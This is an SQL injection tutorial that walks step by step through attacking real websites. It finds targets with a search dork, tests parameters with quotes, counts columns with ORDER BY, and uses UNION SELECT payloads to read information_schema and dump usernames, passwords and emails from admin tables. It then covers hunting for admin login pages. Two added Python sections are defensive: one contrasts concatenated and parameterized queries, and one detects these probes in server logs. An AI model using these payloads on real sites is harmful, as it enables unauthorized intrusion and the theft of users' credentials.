SECTION 1 - Searching for the vulnerability

inurl:buy.php?id=

This will be inputted into a search engine and because of the "inurl:" part of the dork, the search engine will return results with URLs that contain the same characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection.

Now let's say we found a page that looks like this:

http://www.site.com/buy.php?id=1

In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so it looks like this:

http://www.site.com/buy.php?id=1'
or
http://www.site.com/buy.php?id='1

After pressing enter, if the website returns an error such as the following:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 7

or something along those lines, this means it's vulnerable to injection (the quote broke the syntax of the SQL query, the query failed, and the page printed the database error instead of handling it).

In some cases you will find a website such as this:

http://www.site.com/buy.php?id=1&catid=2

Then you must use the same technique of adding a ', except it must go between the value (in this case the number) and the operator (the "=" sign) so it looks like this:

http://www.site.com/buy.php?id='1&catid='2

There are programs that will do this for you but to start off I would suggest simply doing things manually, using Google, and so I won't post any for you guys. If you feel compelled to use one anyway, I recommend the Exploit Scanner by Reiluke.
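As an added illustration (not from the original tutorial) of why the quote test above produces an error, and of the fix a site owner should apply: a hypothetical Python/sqlite3 stand-in for the buy.php lookup, once with the id pasted into the query text and once validated and bound as a parameter. The products table and its rows are constructed for the demo.

```python
import sqlite3


def make_db():
    # Constructed demo database standing in for the tutorial's buy.php backend
    # (hypothetical schema and rows; not from the original page).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "widget", 9.99), (2, "gadget", 19.99)])
    return conn


def lookup_vulnerable(conn, raw_id):
    # Mirrors the classic buy.php pattern: the id parameter is pasted straight into
    # the SQL text, so a quote in the input changes the query's syntax. The
    # mysql_fetch_array() warning in Section 1 is this same failure surfacing to the page.
    sql = f"SELECT name, price FROM products WHERE id = {raw_id}"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, raw_id):
    # Hardened form: validate the expected type, then bind the value as a parameter.
    # Whatever the input contains, the driver treats it as data, never as SQL.
    try:
        pid = int(raw_id)
    except ValueError:
        return []          # reject rather than echo a database error to the visitor
    return conn.execute("SELECT name, price FROM products WHERE id = ?", (pid,)).fetchall()


def probe(conn, handler, raw_id):
    # Returns what someone testing the parameter would observe: a database error
    # (the signal the tutorial looks for) or an ordinary result set.
    try:
        return ("rows", handler(conn, raw_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))
```

The same quote that errors out the concatenated query is simply a non-integer to the hardened handler, which returns nothing and leaks nothing.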
SECTION 2 - Determining the amount of columns

In order for us to be able to use commands and get results we must know how many columns there are on a website. So to find the number of columns we must use a very complex and advanced method that I like to call "Trial and Error" with the ORDER BY command.

NOTE: SQL does not care whether or not your letters are capitalized and I'm just doing it for clarity. For all it cares your queries could look like this:

php?id=-1 CaN I HaZ TeH PaSSwOrDs? PLz aNd ThX

IT DOESN'T MATTER (btw please don't think that was an actual command).

So back to the ORDER BY command. To find the number of columns we write a query with incrementing values until we get an error, like this:

http://www.site.com/buy.php?id=1 ORDER BY 1--   <---No error
http://www.site.com/buy.php?id=1 ORDER BY 2--   <---No error
http://www.site.com/buy.php?id=1 ORDER BY 3--   <---No error
http://www.site.com/buy.php?id=1 ORDER BY 4--   <---No error
http://www.site.com/buy.php?id=1 ORDER BY 5--   <---ERROR!

This means that there are FOUR columns! ORDER BY 5 fails because the original query only returns four columns to sort by.

DON'T FORGET TO INCLUDE THE DOUBLE NULL (--) AFTER THE QUERY. VERY IMPORTANT! (The -- is the SQL comment marker; it makes the server ignore whatever followed the id in its original query.)

SECTION 3 - Finding which columns are vulnerable

So we know that there are four columns, now we have to find out which ones are vulnerable to injection. To do this we use the UNION and SELECT queries while keeping the double null (--) at the end of the string. There is also one other difference that is small in size but not in importance, see if you can spot it:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,2,3,4--

If you couldn't spot the difference, it's the extra null in between the "=" sign and the value (the number). The minus sign makes the id match no real row, so the page displays the values from the UNION instead. Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database, which we will see in Part Two.

Part Two - Gathering Information

In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.

Determining the SQL version

Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. In this tutorial I will not be covering version 4 because it really is a guessing game and for the kind of sites that are still using it, it's not worth your time.

NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.

If we look back to the end of Section Three in Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2). The command should look like this:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,@@version,3,4--

Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()". If the website still does not display the version try using unhex(hex()) which looks like this:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--

NOTE: If this method must be used here, it must be used for the rest of the injection as well.

Now what you want to see is something along these lines: 5.1.47-community-log, which is the version of SQL for the website.

Finding the database

Finding the name of the database is not always a necessary step to take to gather the information that you want, however in my experience following these steps and finding the database may sometimes lead to a higher success rate. To find the database we use a query like the one below:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

This could sometimes return more results than necessary and so that is when we switch over to this query instead:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,concat(database()),3,4--

Well done hacker! You now have the name of the database! Copy and paste the name somewhere safe, we'll need it for later.

The Good Stuff

This is the fun part where we will find the usernames, emails and passwords!

Finding the table names

To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

It may look long and confusing but once you understand it, it really isn't, so I'll try to explain. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables, so if you notice that a table is cut off on the end switch over to limit, which I will explain now.

http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

What this does is it shows the first and only the first table. So if we were to run out of characters on, let's say, the 31st table we could use this query:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--

Notice how my limit was 30,1 instead of 31,1? This is because when using limit it starts from 0, which means that the 30th is actually the 31st. You now have all the table names!

Finding the column names

Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s), tblUser(s) and so on, but it varies between sites. After deciding which table you think contains the information, use this query (in my example I'll be using the table name "Admin"):

http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error, but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex (a link to a website that does this is included at the end of the tutorial).

UPDATE: If you get an error at this point all you must do is follow these steps:
1. Copy the name of the table that you are trying to access.
2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".
3. Click convert.
4. Copy the string of numbers/letters under Hex into your query so it looks like this:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added a "0x"; all this does is tell the server that the following characters are part of a hex string. You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.

Displaying the column contents

We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon (:), which will group the username:password:email for the individual users just like that, including the admin.

FINALLY! Now you have the login information for the users of the site. All you have to do now is find the admin login page, which brings us to the last section.

Finding the admin page

Usually the admin page will be directly off of the site's home page, here are some examples:

http://www.site.com/admin
http://www.site.com/adminlogin
http://www.site.com/modlogin
http://www.site.com/moderator

Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program, Reiluke has coded one for that as well. Search Admin Finder by Reiluke.

Hex/Char Converter

http://www.swingnote.com/tools/texttohex.php
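An added example from the defender's side, not part of the tutorial: a small detector that runs over constructed web-server access log lines and flags the probes described in the sections above (a stray quote after the id, ORDER BY counting, UNION SELECT, information_schema and @@version lookups, 0x hex literals). The log format, client addresses and timestamps are constructed; the request paths mirror the tutorial's own queries.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log sample (hypothetical hosts, addresses and timestamps);
# the requests mirror the probes the tutorial walks through.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /buy.php?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /buy.php?id=1' HTTP/1.1" 200 214
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /buy.php?id=1%20ORDER%20BY%205-- HTTP/1.1" 200 214
203.0.113.5 - - [10/Oct/2023:13:57:10 +0000] "GET /buy.php?id=-1%20UNION%20SELECT%201,@@version,3,4-- HTTP/1.1" 200 530
203.0.113.5 - - [10/Oct/2023:13:58:31 +0000] "GET /buy.php?id=-1%20UNION%20SELECT%201,group_concat(column_name),3,4%20FROM%20information_schema.columns%20WHERE%20table_name=0x41646d696e-- HTTP/1.1" 200 740
198.51.100.7 - - [10/Oct/2023:14:01:00 +0000] "GET /buy.php?id=2&catid=7 HTTP/1.1" 200 498
"""

# Each indicator is one technique from the tutorial, matched on the decoded query string.
INDICATORS = [
    ("quote-probe", re.compile(r"=\s*-?\d*'")),                          # id=1' or id='1
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),         # column counting
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\b", re.I)),
    ("version-fingerprint", re.compile(r"@@version|\bversion\(\)", re.I)),
    ("hex-literal", re.compile(r"\b0x[0-9a-f]{2,}\b", re.I)),            # 0x41646d696e, 0x3a
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def scan(log_text):
    """Return (line_number, [indicator names]) for every request that trips an indicator.
    Status codes are deliberately ignored: a PHP warning like the one in Section 1 is
    still served as 200, so the payload, not the response code, is the signal."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        _, _, query = m.group(1).partition("?")
        decoded = unquote_plus(query)  # undo %20 and friends before matching
        names = sorted(name for name, rx in INDICATORS if rx.search(decoded))
        if names:
            hits.append((lineno, names))
    return hits


if __name__ == "__main__":
    for lineno, names in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(names)}")
```

The ordinary catalogue requests on lines 1 and 6 produce no hits, while the four probe lines are each attributed to the technique they correspond to.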